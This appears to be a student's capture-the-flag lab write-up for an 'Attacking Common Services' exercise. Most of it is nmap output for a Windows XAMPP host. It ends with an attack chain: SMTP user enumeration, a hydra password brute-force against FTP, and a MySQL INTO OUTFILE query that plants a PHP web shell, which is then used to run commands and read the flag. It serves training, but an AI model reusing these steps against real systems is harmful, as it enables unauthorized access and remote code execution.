Attacking Common Services - Easy Lab
May 27, 2024
# Nmap 7.94 scan initiated Tue May 28 14:21:46 2024 as: nmap -sC -sV -oN nmap 10.129.11.207
Nmap scan report for 10.129.11.207
Host is up (0.37s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp
|_ssl-date: 2024-05-28T06:23:45+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Not valid before: 2022-04-21T19:27:17
|_Not valid after: 2032-04-18T19:27:17
| fingerprint-strings:
| GenericLines:
| 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| Command unknown, not supported or not allowed...
| Command unknown, not supported or not allowed...
| NULL, SMBProgNeg:
| 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| SSLSessionReq:
| 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
|_ Command unknown, not supported or not allowed...
25/tcp open smtp hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
| http-title: Welcome to XAMPP
|_Requested resource was http://10.129.11.207/dashboard/
443/tcp open ssl/https Core FTP HTTPS Server
|_ssl-date: 2024-05-28T06:23:45+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Not valid before: 2022-04-21T19:27:17
|_Not valid after: 2032-04-18T19:27:17
|_http-server-header: Core FTP HTTPS Server
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 401 Unauthorized
| Date:Tue, 28 Apr 2024 06:22:35 GMT
| Server: Core FTP HTTPS Server
| Connection: close
| WWW-Authenticate: Basic realm="Restricted Area"
| Content-Type: text/html
| Content-length: 61
| <BODY>
| <HTML>
| HTTP/1.1 401 Unauthorized
| </BODY>
|_ </HTML>
587/tcp open smtp hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 11
| Capabilities flags: 63486
| Some Capabilities: FoundRows, Support41Auth, ODBCClient, Speaks41ProtocolOld, LongColumnFlag, IgnoreSigpipes, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, InteractiveClient, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsCompression, SupportsTransactions, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: fJ~[0x2-)$z[;RkDRQ|>
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-EASY
| NetBIOS_Domain_Name: WIN-EASY
| NetBIOS_Computer_Name: WIN-EASY
| DNS_Domain_Name: WIN-EASY
| DNS_Computer_Name: WIN-EASY
| Product_Version: 10.0.17763
|_ System_Time: 2024-05-28T06:22:48+00:00
|_ssl-date: 2024-05-28T06:23:44+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=WIN-EASY
| Not valid before: 2024-05-27T06:20:20
|_Not valid after: 2024-11-26T06:20:20
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port21-TCP:V=7.94%I=7%D=5/28%Time=6655781C%P=x86_64-pc-linux-gnu%r(NULL
SF:,41,"220\x20Core\x20FTP\x20Server\x20Version\x202\.0,\x20build\x20725,\
SF:x2064-bit\x20Unregistered\r\n")%r(GenericLines,AD,"220\x20Core\x20FTP\x
SF:20Server\x20Version\x202\.0,\x20build\x20725,\x2064-bit\x20Unregistered
SF:\r\n502\x20Command\x20unknown,\x20not\x20supported\x20or\x20not\x20allo
SF:wed\.\.\.\r\n502\x20Command\x20unknown,\x20not\x20supported\x20or\x20no
SF:t\x20allowed\.\.\.\r\n")%r(SSLSessionReq,77,"220\x20Core\x20FTP\x20Serv
SF:er\x20Version\x202\.0,\x20build\x20725,\x2064-bit\x20Unregistered\r\n50
SF:2\x20Command\x20unknown,\x20not\x20supported\x20or\x20not\x20allowed\.\
SF:.\.\r\n")%r(SMBProgNeg,41,"220\x20Core\x20FTP\x20Server\x20Version\x202
SF:\.0,\x20build\x20725,\x2064-bit\x20Unregistered\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port443-TCP:V=7.94%T=SSL%I=7%D=5/28%Time=66557828%P=x86_64-pc-linux-gnu
SF:%r(GetRequest,110,"HTTP/1\.1\x20401\x20Unauthorized\r\nDate:Tue,\x2028\
SF:x20Apr\x202024\x2006:22:35\x20GMT\r\nServer:\x20Core\x20FTP\x20HTTPS\x2
SF:0Server\r\nConnection:\x20close\r\nWWW-Authenticate:\x20Basic\x20realm=
SF:\"Restricted\x20Area\"\r\nContent-Type:\x20text/html\r\nContent-length:
SF:\x2061\r\n\r\n<BODY>\r\n<HTML>\r\nHTTP/1\.1\x20401\x20Unauthorized\r\n<
SF:/BODY>\r\n</HTML>\r\n\r\n");
Service Info: Host: WIN-EASY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 2s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 28 14:24:01 2024 -- 1 IP address (1 host up) scanned in 135.70 secondssmtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.236.141
hydra -l fiona -P /usr/share/wordlists/rockyou.txt 10.129.236.141 ftp
login: fiona password: 987654321ftp 10.129.236.141
ls -la
mget *
When im uploading the FTP im not getting any revshell instead it just downloading the file and not executing any of the code inside the rev shell.
So i move to php which is in xampp htdocs
mysql -h 10.129.182.251 -u fiona -p987654321
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/xampp/htdocs/webshell.php';
http://10.129.182.251/webshell.php?c=whoami
Finding flag in Windows cmd
dir C:\Users\flag.txt /s
Retrieving the flag
more C:\Users\Administrator\Desktop\flag.txt
Last updated